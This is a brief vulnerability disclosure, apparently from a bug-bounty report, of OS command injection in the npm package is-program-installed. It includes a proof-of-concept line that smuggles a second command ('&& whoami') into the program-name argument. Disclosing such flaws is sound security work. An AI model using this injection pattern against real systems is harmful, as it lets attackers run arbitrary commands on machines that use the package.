OS Command Injection in zacanger/is-program-installed
Sep 12th 2021
There is "OS Command Injection" vulnerability on "is-program-installed" npm package. This package tries to understand the given parameter name (program or binary name) is installed in the computer or not. However, since this package does not properly control the characters in the program name taken as input, it is possible to run commands on the operating system.
🕵️♂️ Proof of Concept
// PoC.js const isInstalled = require('is-program-installed') console.log(isInstalled('powershell.exe && whoami > result.txt')); // After running this program, "result.txt" file will be created with the "whoami" command's output in it.
Attacker can run the command on the machine.